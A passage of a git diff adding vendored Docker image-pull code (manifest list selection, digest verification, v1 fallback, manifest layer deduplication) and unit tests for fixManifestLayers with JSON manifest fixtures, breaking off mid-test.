supports optional + // "features" and "variant" fields. These are not yet used. + // Once they are, their values should be interpreted here. 
+ if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == runtime.GOOS { + manifestDigest = manifestDescriptor.Digest + break + } + } + + if manifestDigest == "" { + return "", "", errors.New("no supported platform found in manifest list") + } + + manSvc, err := p.repo.Manifests(ctx) + if err != nil { + return "", "", err + } + + manifest, err := manSvc.Get(ctx, manifestDigest) + if err != nil { + return "", "", err + } + + manifestRef, err := reference.WithDigest(reference.TrimNamed(ref), manifestDigest) + if err != nil { + return "", "", err + } + + switch v := manifest.(type) { + case *schema1.SignedManifest: + id, _, err = p.pullSchema1(ctx, manifestRef, v) + if err != nil { + return "", "", err + } + case *schema2.DeserializedManifest: + id, _, err = p.pullSchema2(ctx, manifestRef, v) + if err != nil { + return "", "", err + } + default: + return "", "", errors.New("unsupported manifest format") + } + + return id, manifestListDigest, err +} + +func (p *v2Puller) pullSchema2Config(ctx context.Context, dgst digest.Digest) (configJSON []byte, err error) { + blobs := p.repo.Blobs(ctx) + configJSON, err = blobs.Get(ctx, dgst) + if err != nil { + return nil, err + } + + // Verify image config digest + verifier, err := digest.NewDigestVerifier(dgst) + if err != nil { + return nil, err + } + if _, err := verifier.Write(configJSON); err != nil { + return nil, err + } + if !verifier.Verified() { + err := fmt.Errorf("image config verification failed for digest %s", dgst) + logrus.Error(err) + return nil, err + } + + return configJSON, nil +} + +// schema2ManifestDigest computes the manifest digest, and, if pulling by +// digest, ensures that it matches the requested digest. +func schema2ManifestDigest(ref reference.Named, mfst distribution.Manifest) (digest.Digest, error) { + _, canonical, err := mfst.Payload() + if err != nil { + return "", err + } + + // If pull by digest, then verify the manifest digest. 
+ if digested, isDigested := ref.(reference.Canonical); isDigested { + verifier, err := digest.NewDigestVerifier(digested.Digest()) + if err != nil { + return "", err + } + if _, err := verifier.Write(canonical); err != nil { + return "", err + } + if !verifier.Verified() { + err := fmt.Errorf("manifest verification failed for digest %s", digested.Digest()) + logrus.Error(err) + return "", err + } + return digested.Digest(), nil + } + + return digest.FromBytes(canonical), nil +} + +// allowV1Fallback checks if the error is a possible reason to fallback to v1 +// (even if confirmedV2 has been set already), and if so, wraps the error in +// a fallbackError with confirmedV2 set to false. Otherwise, it returns the +// error unmodified. +func allowV1Fallback(err error) error { + switch v := err.(type) { + case errcode.Errors: + if len(v) != 0 { + if v0, ok := v[0].(errcode.Error); ok && shouldV2Fallback(v0) { + return fallbackError{ + err: err, + confirmedV2: false, + transportOK: true, + } + } + } + case errcode.Error: + if shouldV2Fallback(v) { + return fallbackError{ + err: err, + confirmedV2: false, + transportOK: true, + } + } + case *url.Error: + if v.Err == auth.ErrNoBasicAuthCredentials { + return fallbackError{err: err, confirmedV2: false} + } + } + + return err +} + +func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Named) (m *schema1.Manifest, err error) { + // If pull by digest, then verify the manifest digest. NOTE: It is + // important to do this first, before any other content validation. If the + // digest cannot be verified, don't even bother with those other things. 
+ if digested, isCanonical := ref.(reference.Canonical); isCanonical { + verifier, err := digest.NewDigestVerifier(digested.Digest()) + if err != nil { + return nil, err + } + if _, err := verifier.Write(signedManifest.Canonical); err != nil { + return nil, err + } + if !verifier.Verified() { + err := fmt.Errorf("image verification failed for digest %s", digested.Digest()) + logrus.Error(err) + return nil, err + } + } + m = &signedManifest.Manifest + + if m.SchemaVersion != 1 { + return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, ref.String()) + } + if len(m.FSLayers) != len(m.History) { + return nil, fmt.Errorf("length of history not equal to number of layers for %q", ref.String()) + } + if len(m.FSLayers) == 0 { + return nil, fmt.Errorf("no FSLayers in manifest for %q", ref.String()) + } + return m, nil +} + +// fixManifestLayers removes repeated layers from the manifest and checks the +// correctness of the parent chain. +func fixManifestLayers(m *schema1.Manifest) error { + imgs := make([]*image.V1Image, len(m.FSLayers)) + for i := range m.FSLayers { + img := &image.V1Image{} + + if err := json.Unmarshal([]byte(m.History[i].V1Compatibility), img); err != nil { + return err + } + + imgs[i] = img + if err := v1.ValidateID(img.ID); err != nil { + return err + } + } + + if imgs[len(imgs)-1].Parent != "" && runtime.GOOS != "windows" { + // Windows base layer can point to a base layer parent that is not in manifest. 
+ return errors.New("invalid parent ID in the base layer of the image") + } + + // check general duplicates to error instead of a deadlock + idmap := make(map[string]struct{}) + + var lastID string + for _, img := range imgs { + // skip IDs that appear after each other, we handle those later + if _, exists := idmap[img.ID]; img.ID != lastID && exists { + return fmt.Errorf("ID %+v appears multiple times in manifest", img.ID) + } + lastID = img.ID + idmap[lastID] = struct{}{} + } + + // backwards loop so that we keep the remaining indexes after removing items + for i := len(imgs) - 2; i >= 0; i-- { + if imgs[i].ID == imgs[i+1].ID { // repeated ID. remove and continue + m.FSLayers = append(m.FSLayers[:i], m.FSLayers[i+1:]...) + m.History = append(m.History[:i], m.History[i+1:]...) + } else if imgs[i].Parent != imgs[i+1].ID { + return fmt.Errorf("Invalid parent ID. Expected %v, got %v.", imgs[i+1].ID, imgs[i].Parent) + } + } + + return nil +} + +func createDownloadFile() (*os.File, error) { + return ioutil.TempFile("", "GetImageBlob") +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_test.go b/vendor/github.com/docker/docker/distribution/pull_v2_test.go new file mode 100644 index 0000000000..b745642e3b --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2_test.go @@ -0,0 +1,183 @@ +package distribution + +import ( + "encoding/json" + "io/ioutil" + "reflect" + "runtime" + "strings" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/docker/reference" +) + +// TestFixManifestLayers checks that fixManifestLayers removes a duplicate +// layer, and that it makes no changes to the manifest when called a second +// time, after the duplicate is removed. 
+func TestFixManifestLayers(t *testing.T) { + duplicateLayerManifest := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 
[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 
[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain 
--untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + duplicateLayerManifestExpectedOutput := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: 
"{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: 
"{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" 
./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + if err := fixManifestLayers(&duplicateLayerManifest); err != nil { + t.Fatalf("unexpected error from fixManifestLayers: %v", err) + } + + if !reflect.DeepEqual(duplicateLayerManifest, duplicateLayerManifestExpectedOutput) { + t.Fatal("incorrect output from fixManifestLayers on duplicate layer manifest") + } + + // Run fixManifestLayers again and confirm that it doesn't change the + // manifest (which no longer has duplicate layers). + if err := fixManifestLayers(&duplicateLayerManifest); err != nil { + t.Fatalf("unexpected error from fixManifestLayers: %v", err) + } + + if !reflect.DeepEqual(duplicateLayerManifest, duplicateLayerManifestExpectedOutput) { + t.Fatal("incorrect output from fixManifestLayers on duplicate layer manifest (second pass)") + } +} + +// TestFixManifestLayersBaseLayerParent makes sure that fixManifestLayers fails +// if the base layer configuration specifies a parent. 
+func TestFixManifestLayersBaseLayerParent(t *testing.T) { + // TODO Windows: Fix this unit text + if runtime.GOOS == "windows" { + t.Skip("Needs fixing on Windows") + } + duplicateLayerManifest := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 
[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 
[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"parent\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X 
main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "invalid parent ID in the base layer of the image") { + t.Fatalf("expected an invalid parent ID error from fixManifestLayers") + } +} + +// TestFixManifestLayersBadParent makes sure that fixManifestLayers fails +// if an image configuration specifies a parent that doesn't directly follow +// that (deduplicated) image in the image history. 
+func TestFixManifestLayersBadParent(t *testing.T) { + duplicateLayerManifest := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: 